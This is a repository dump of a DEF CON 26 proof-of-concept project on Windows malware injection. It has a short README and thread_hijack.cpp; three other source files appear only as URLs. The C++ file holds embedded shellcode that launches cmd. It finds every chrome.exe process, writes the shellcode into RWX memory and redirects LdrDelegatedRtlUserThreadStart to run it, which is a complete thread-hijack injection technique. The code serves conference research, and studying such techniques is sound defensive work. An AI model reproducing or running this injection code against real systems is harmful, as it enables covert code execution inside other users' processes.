├── ole32_inject.cpp ├── comctl32_inject.cpp ├── powerloader_inject.cpp ├── README.md └── thread_hijack.cpp /ole32_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aaaddress1/Win-Exploit-Inject/HEAD/ole32_inject.cpp -------------------------------------------------------------------------------- /comctl32_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aaaddress1/Win-Exploit-Inject/HEAD/comctl32_inject.cpp -------------------------------------------------------------------------------- /powerloader_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aaaddress1/Win-Exploit-Inject/HEAD/powerloader_inject.cpp -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Win-Exploit-Inject 2 | PoC for DEF CON 26: Playing Malware Injection with Exploit thoughts. 3 | 4 | Check Slide at [Speaker Deck](https://speakerdeck.com/aaaddress1/playing-malware-injection-with-exploit-thoughts) if you're interested. 5 | -------------------------------------------------------------------------------- /thread_hijack.cpp: -------------------------------------------------------------------------------- 1 | /** 2 | * DEF CON 26: 3 | * Playing Malware Injection with Exploit thoughts 4 | * PoC 4 - Thread Hijack 5 | * by aaaddress1@chroot.org 6 | */ 7 | #include 8 | #include 9 | #include 10 | 11 | unsigned char buf[] = \ 12 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" \ 13 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" \ 14 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" \ 15 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" \ 16 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" \ 17 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" \ 18 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" \ 19 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" \ 20 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" \ 21 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" \ 22 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" \ 23 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" \ 24 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" \ 25 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" \ 26 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" \ 27 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ 28 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" \ 29 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" \ 30 | "\x00"; 31 | 32 | void inject(DWORD pid) { 33 | 34 | #ifdef _WIN64 35 | UINT64 ptrUsrThrdStrt = (UINT64)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlUserThreadStart"); 36 | printf("RtlUserThreadStart @ %llx\n", ptrUsrThrdStrt); 37 | 38 | UINT64 offsetVia = *(UINT32 *)(ptrUsrThrdStrt + 0x1b + 2); 39 | offsetVia = (ptrUsrThrdStrt + 0x1b) + offsetVia + 6; 40 | printf("LdrDelegatedRtlUserThreadStart @ %llx\n", offsetVia); 41 | 42 | // write shellcode 43 | HANDLE access_token = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); 44 | LPVOID alloc_mem = VirtualAllocEx(access_token, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 45 | WriteProcessMemory(access_token, alloc_mem, &buf, sizeof(buf), NULL); 46 | printf("shellcode @ %llx\n", alloc_mem); 47 | 48 | // write LdrDelegatedRtlUserThreadStart 49 | WriteProcessMemory(access_token, LPVOID(offsetVia), &alloc_mem, 8, NULL) 50 | 51 | #else 52 | UINT32 ptrUsrThrdStrt = (UINT32)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlUserThreadStart"); 53 | printf("RtlUserThreadStart @ %llx\n", ptrUsrThrdStrt); 54 | 55 | UINT32 offsetVia = *(UINT32 *)(ptrUsrThrdStrt + 0x0A); 56 | offsetVia = (ptrUsrThrdStrt + 0x07) + offsetVia + 7; 57 | printf("LdrDelegatedRtlUserThreadStart @ %llx\n", offsetVia); 58 | 59 | // write shellcode 60 | HANDLE access_token = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); 61 | LPVOID alloc_mem = VirtualAllocEx(access_token, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 62 | WriteProcessMemory(access_token, alloc_mem, &buf, sizeof(buf), NULL); 63 | printf("shellcode @ %llx\n", alloc_mem); 64 | 65 | // write LdrDelegatedRtlUserThreadStart 66 | WriteProcessMemory(access_token, LPVOID(offsetVia), &alloc_mem, 4, NULL); 67 | #endif 68 | } 69 | 70 | 71 | void inject_via_name(const char proc_name[]) { 72 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 73 | PROCESSENTRY32 process = { 0 }; 74 | process.dwSize = sizeof(process); 75 | 76 | if (Process32First(snapshot, &process)) 77 | while (Process32Next(snapshot, &process)) 78 | if (!stricmp(process.szExeFile, proc_name)) 79 | inject(process.th32ProcessID); 80 | 81 | CloseHandle(snapshot); 82 | } 83 | 84 | int main(void) { 85 | inject_via_name("chrome.exe"); 86 | return 0; 87 | } --------------------------------------------------------------------------------